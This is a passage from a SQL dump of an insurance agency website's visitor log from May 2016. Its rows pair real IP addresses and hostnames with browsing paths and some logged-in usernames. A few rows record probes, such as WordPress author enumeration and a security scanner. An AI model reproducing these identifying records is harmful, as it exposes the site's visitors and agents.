(Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1280 x 1024','','','','','','0','0',0),(28859,'0b_b13481f0862be6dc8ec36ec9b622d740','1463062379','64.47.214.130','host-64-47-214-130.masergy.com','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1280 x 1024','','','','','','0','0',0),(28862,'0b_b13481f0862be6dc8ec36ec9b622d740','1463062388','64.47.214.130','host-64-47-214-130.masergy.com','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/about-us/','',0,'Win7','Chrome 50','us','1280 x 1024','','','','','','0','51',0),(28865,'0b_b13481f0862be6dc8ec36ec9b622d740','1463062398','64.47.214.130','host-64-47-214-130.masergy.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/carriers/','',0,'Win7','Chrome 50','us','1280 x 1024','','','','','','0','51',0),(28868,'0b_b13481f0862be6dc8ec36ec9b622d740','1463062400','64.47.214.130','host-64-47-214-130.masergy.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 50','us','1280 x 1024','','','','','','0','51',0),(28871,'0b_b13481f0862be6dc8ec36ec9b622d740','1463062401','64.47.214.130','host-64-47-214-130.masergy.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1280 x 1024','','','','','','0','0',0),(28874,'0b_3608c5b41e53d6ae7b379707b560be49','1463062771','5.153.234.154','5.153.234.154','/?author=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(28875,'0b_3608c5b41e53d6ae7b379707b560be49','1463062781','5.153.234.154','5.153.234.154','/author/admin/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(28878,'0b_3608c5b41e53d6ae7b379707b560be49','1463062793','5.153.234.154','5.153.234.154','/?author=2','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(28880,'0b_7939a355b7ed4a7484d968da14659895','1463063470','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','roisy','','0','0',0),(28883,'0b_7939a355b7ed4a7484d968da14659895','1463063492','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/forms/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','roisy','','0','51',0),(28884,'0b_7939a355b7ed4a7484d968da14659895','1463063493','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','roisy','','0','0',0),(28886,'0b_7939a355b7ed4a7484d968da14659895','1463063500','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','roisy','','0','51',0),(28889,'0b_3dbd5b9fdaf4916820a0203495f60bc1','1463063619','37.115.184.150','37-115-184-150-broadband.kyivstar.net','/','Opera/7.60 (Windows NT 5.2; U) [en] (IBM EVV/3.0/EAK01AG9/LE)','http://www.stadiumhotelguide.com/','',0,'Win2003','Opera 7','us','','','','','','','0','0',0),(28892,'0b_3dbd5b9fdaf4916820a0203495f60bc1','1463063620','37.115.184.150','37-115-184-150-broadband.kyivstar.net','/','Opera/7.60 (Windows NT 5.2; U) [en] (IBM EVV/3.0/EAK01AG9/LE)','http://www.stadiumhotelguide.com/','',0,'Win2003','Opera 7','us','','','','','','','0','0',0),(28893,'0b_97d96d340d69dc814a20a8bf4b5f9677','1463063815','54.241.113.24','ec2-54-241-113-24.us-west-1.compute.amazonaws.com','/','MetaInspector/5.1.1 (+https://github.com/jaimeiniesta/metainspector)','','',0,'','','','','','MetaInspector','','','','0','0',0),(28895,'0b_3faaa58588d9878d92ca0f95330c036a','1463064228','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(28896,'0b_ee4000753ca866f95a6da9fb0a53256f','1463065620','69.175.67.58','newscan04.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(28899,'0b_ee4000753ca866f95a6da9fb0a53256f','1463065624','69.175.67.58','newscan04.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(28901,'0b_ee4000753ca866f95a6da9fb0a53256f','1463065633','69.175.67.58','newscan04.sitelock.com','/home/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(28904,'0b_ee4000753ca866f95a6da9fb0a53256f','1463065635','69.175.67.58','newscan04.sitelock.com','/insentives/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(28905,'0b_f4d36b8d64bccaf540c0871139bab9f7','1463065916','157.55.39.85','msnbot-157-55-39-85.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(28908,'0b_725feb9bdced4874fae764efabd2d95f','1463066932','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(28910,'0b_725feb9bdced4874fae764efabd2d95f','1463066934','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(28911,'0b_928d41e5247ea83754c1b1b86d334629','1463067009','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(28913,'0b_928d41e5247ea83754c1b1b86d334629','1463067010','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(28914,'0b_307fd7efcf0d5920d599aed4847d879d','1463067132','67.85.210.17','ool-4355d211.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win8','Chrome 50','us','','','','','','','0','0',0),(28916,'0b_307fd7efcf0d5920d599aed4847d879d','1463067133','67.85.210.17','ool-4355d211.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 50','us','','','','','','','0','0',0),(28917,'0b_bbff2cf5348f8befe9d34f2c5dae0539','1463067153','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(28920,'0b_6a62217b657bdc518e8e9719692a1d93','1463067159','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','0',0),(28923,'0b_6a62217b657bdc518e8e9719692a1d93','1463067162','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(28926,'0b_6a62217b657bdc518e8e9719692a1d93','1463067170','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(28929,'0b_6a62217b657bdc518e8e9719692a1d93','1463067174','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/forms/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(28932,'0b_6a62217b657bdc518e8e9719692a1d93','1463067196','75.99.37.250','ool-4b6325fa.static.optonline.net','/carrier-field-underwriting-guides/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(28934,'0b_6a62217b657bdc518e8e9719692a1d93','1463067730','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(28937,'0b_6a62217b657bdc518e8e9719692a1d93','1463067735','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(28940,'0b_6a62217b657bdc518e8e9719692a1d93','1463067747','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(28941,'0b_6a62217b657bdc518e8e9719692a1d93','1463067934','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/forms/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(28944,'0b_6a62217b657bdc518e8e9719692a1d93','1463067938','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(28946,'0b_928d41e5247ea83754c1b1b86d334629','1463068319','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(28947,'0b_928d41e5247ea83754c1b1b86d334629','1463068320','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(28950,'0b_928d41e5247ea83754c1b1b86d334629','1463068470','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(28952,'0b_928d41e5247ea83754c1b1b86d334629','1463068471','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(28955,'0b_928d41e5247ea83754c1b1b86d334629','1463068507','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(28958,'0b_928d41e5247ea83754c1b1b86d334629','1463068508','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(28959,'0b_928d41e5247ea83754c1b1b86d334629','1463068568','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(28962,'0b_928d41e5247ea83754c1b1b86d334629','1463068569','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(28965,'0b_928d41e5247ea83754c1b1b86d334629','1463068675','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(28968,'0b_928d41e5247ea83754c1b1b86d334629','1463068676','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(28971,'0b_63ee70117fe4b0a90f07c6b9bd40385a','1463069386','66.249.66.18','crawl-66-249-66-18.googlebot.com','/insentives/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(28974,'0b_da7096e61172f8a8566898baf2117922','1463069391','54.241.113.24','ec2-54-241-113-24.us-west-1.compute.amazonaws.com','/','MetaInspector/5.1.1 (+https://github.com/jaimeiniesta/metainspector)','','',0,'','','','','','MetaInspector','','','','0','0',0),(28976,'0b_ffa268654e6f9368c9dd38d2385b8cc0','1463069477','188.143.232.22','188.143.232.22','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','','',0,'WinXP','IE 6','','','','','','','','3','0',0),(28977,'0b_ffa268654e6f9368c9dd38d2385b8cc0','1463069508','188.143.232.22','188.143.232.22','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','','',0,'WinXP','IE 6','','','','','','','','3','0',0),(28979,'0b_ffa268654e6f9368c9dd38d2385b8cc0','1463069519','188.143.232.22','188.143.232.22','/agent-tools/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','','',0,'WinXP','IE 6','','','','','','','','3','0',0),(28982,'0b_ffa268654e6f9368c9dd38d2385b8cc0','1463069530','188.143.232.22','188.143.232.22','/register/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','','',0,'WinXP','IE 6','','','','','','','','3','0',0),(28983,'0b_ffa268654e6f9368c9dd38d2385b8cc0','1463069541','188.143.232.22','188.143.232.22','/about-us/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','','',0,'WinXP','IE 6','','','','','','','','3','0',0),(28985,'0b_ffa268654e6f9368c9dd38d2385b8cc0','1463069552','188.143.232.22','188.143.232.22','/insentives/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','','',0,'WinXP','IE 6','','','','','','','','3','0',0),(28986,'0b_ffa268654e6f9368c9dd38d2385b8cc0','1463069563','188.143.232.22','188.143.232.22','/licensing-contracting/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','','',0,'WinXP','IE 6','','','','','','','','3','0',0),(28989,'0b_ffa268654e6f9368c9dd38d2385b8cc0','1463069574','188.143.232.22','188.143.232.22','/carriers/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','','',0,'WinXP','IE 6','','','','','','','','3','0',0),(28991,'0b_ffa268654e6f9368c9dd38d2385b8cc0','1463069584','188.143.232.22','188.143.232.22','/contact/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','','',0,'WinXP','IE 6','','','','','','','','3','0',0),(28994,'0b_ffa268654e6f9368c9dd38d2385b8cc0','1463069595','188.143.232.22','188.143.232.22','/case-status/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','','',0,'WinXP','IE 6','','','','','','','','3','0',0),(28995,'0b_ffa268654e6f9368c9dd38d2385b8cc0','1463069605','188.143.232.22','188.143.232.22','/forms/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','','',0,'WinXP','IE 6','','','','','','','','3','0',0),(28998,'0b_ffa268654e6f9368c9dd38d2385b8cc0','1463069619','188.143.232.22','188.143.232.22','/igo/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','','',0,'WinXP','IE 6','','','','','','','','3','0',0),(29000,'0b_ffa268654e6f9368c9dd38d2385b8cc0','1463069630','188.143.232.22','188.143.232.22','/term-quotes/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','','',0,'WinXP','IE 6','','','','','','','','3','0',0),(29001,'0b_ffa268654e6f9368c9dd38d2385b8cc0','1463069641','188.143.232.22','188.143.232.22','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','','',0,'WinXP','IE 6','','','','','','','','3','0',0),(29003,'0b_ffa268654e6f9368c9dd38d2385b8cc0','1463069652','188.143.232.22','188.143.232.22','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','','',0,'WinXP','IE 6','','','','','','','','3','0',0),(29004,'0b_ffa268654e6f9368c9dd38d2385b8cc0','1463069663','188.143.232.22','188.143.232.22','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','','',0,'WinXP','IE 6','','','','','','','','3','0',0),(29006,'0b_ffa268654e6f9368c9dd38d2385b8cc0','1463069674','188.143.232.22','188.143.232.22','/?page_id=171?a=pwdreset','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','','',0,'WinXP','IE 6','','','','','','','','3','0',0),(29007,'0b_ffa268654e6f9368c9dd38d2385b8cc0','1463069685','188.143.232.22','188.143.232.22','/?page_id=169','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','','',0,'WinXP','IE 6','','','','','','','','3','0',0),(29010,'0b_ffa268654e6f9368c9dd38d2385b8cc0','1463069698','188.143.232.22','188.143.232.22','/register/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','','',0,'WinXP','IE 6','','','','','','','','3','0',0),(29012,'0b_84fe4be3fd09f0de5f4d38dcc35e4caa','1463069882','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(29015,'0b_84fe4be3fd09f0de5f4d38dcc35e4caa','1463069883','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(29016,'0b_2b34ec6c45f2ab3b3ad748f282b07197','1463071096','141.8.143.235','spider-141-8-143-235.yandex.com','/igo/feed/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(29018,'0b_f42add85e8403b88933d567ca990e904','1463071283','107.153.7.18','107.153.7.18','/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','','','','','','','','0','0',0),(29021,'0b_2b34ec6c45f2ab3b3ad748f282b07197','1463071348','141.8.143.235','spider-141-8-143-235.yandex.com','/term-quotes/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(29022,'0b_84fe4be3fd09f0de5f4d38dcc35e4caa','1463071583','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','51',0),(29024,'0b_6a62217b657bdc518e8e9719692a1d93','1463071743','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/forms/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(29027,'0b_6bacacc5b2b0f59737962f597c2b9ca2','1463071776','75.127.5.194','75-127-5-194-host.colocrossing.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0','http://www.empireins.com/','',0,'Win8 x64','Firefox 34','us','','','','','','','0','0',0),(29030,'0b_6a62217b657bdc518e8e9719692a1d93','1463071840','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(29033,'0b_84fe4be3fd09f0de5f4d38dcc35e4caa','1463072365','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','51',0),(29034,'0b_2d375aa728423fd2345c87b7311c668b','1463072589','157.55.39.85','msnbot-157-55-39-85.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(29036,'0b_114804cf3334a773c51d8b7ecbc0eac2','1463073813','74.90.212.216','ool-4a5ad4d8.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','','',0,'Win8 x64','IE 11','us','','','','','','','0','0',0),(29037,'0b_114804cf3334a773c51d8b7ecbc0eac2','1463073833','74.90.212.216','ool-4a5ad4d8.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win8 x64','IE 11','us','','','','','','','0','0',0),(29039,'0b_858bd0de030bad2a978965a8fe02aa9f','1463073839','74.90.212.216','ool-4a5ad4d8.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win8 x64','IE 11','us','1366 x 768','','','','zlberger','','0','0',0),(29040,'0b_858bd0de030bad2a978965a8fe02aa9f','1463073850','74.90.212.216','ool-4a5ad4d8.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win8 x64','IE 11','us','1366 x 768','','','','zlberger','','0','51',0),(29042,'0b_86b5773011130fba5904c0fdc2eb5a3e','1463073965','40.77.167.96','msnbot-40-77-167-96.search.msn.com','/forms/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(29045,'0b_86b5773011130fba5904c0fdc2eb5a3e','1463074002','40.77.167.94','msnbot-40-77-167-94.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(29048,'0b_94710b6e0b7da45ec509f4d0a765d087','1463074039','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win8','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(29051,'0b_e3e177d81408bf1c9444e640ea1182ac','1463074031','70.39.157.197','70.39.157.197','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','','',0,'Win7 x64','IE 9','us','','','','','','','0','0',0),(29052,'0b_94710b6e0b7da45ec509f4d0a765d087','1463074040','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(29055,'0b_94710b6e0b7da45ec509f4d0a765d087','1463074042','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(29057,'0b_94710b6e0b7da45ec509f4d0a765d087','1463074058','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win8','Chrome 50','us','1920 x 1080','','','','Shmuli','','0','51',0),(29060,'0b_14ead41a993f43c4b184b743e57978dc','1463074611','67.83.103.143','ool-4353678f.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1440 x 900','','','','','','0','0',0),(29063,'0b_14ead41a993f43c4b184b743e57978dc','1463074612','67.83.103.143','ool-4353678f.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1440 x 900','','','','','','0','0',0),(29066,'0b_14ead41a993f43c4b184b743e57978dc','1463074622','67.83.103.143','ool-4353678f.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1440 x 